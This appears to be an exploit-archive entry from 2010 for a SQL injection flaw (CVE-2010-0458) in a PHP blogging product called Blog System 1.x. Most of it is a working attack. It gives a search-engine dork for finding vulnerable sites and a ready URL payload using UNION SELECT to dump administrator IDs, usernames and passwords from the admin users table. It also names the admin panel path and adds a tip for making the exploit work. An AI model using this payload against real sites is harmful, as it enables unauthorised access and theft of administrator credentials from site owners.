Blog System 1.x - 'note' SQL Injection
Author: h4ck3r
type: webapps
platform: php
port:
date_added: 2010-01-20
date_updated:
verified: 1
codes: OSVDB-62062;CVE-2010-0458;OSVDB-62061
tags:
aliases:
screenshot_url:
application_url:
[#] Script : Blog System
[#] Version : 1.x
[#] Link : http://netartmedia.net/blogsystem/
[#] Dork : "powered by Blog System"
[#] Table : websiteadmin_admin_users
[#] Columns : id,username,password,type
[#] Exploit : /blog.php?user=[real-user]¬e=-1549+union+all+select+1,2,3,concat_ws(0x3a,id,username,password,type),5,6,7,8,9+from+websiteadmin_admin_users--
[#] CP : /BO
[#] Regards : ('Dr.2' , 'd3hydr8' , 'jonathan59' , 'inkubus' , 'Tundergun' , 'VMw4r3' , 'TinKode' , 'darkc0de's members')
[#] Note : replace [real-user] with a user exists in the blog ,, otherwise it will not work.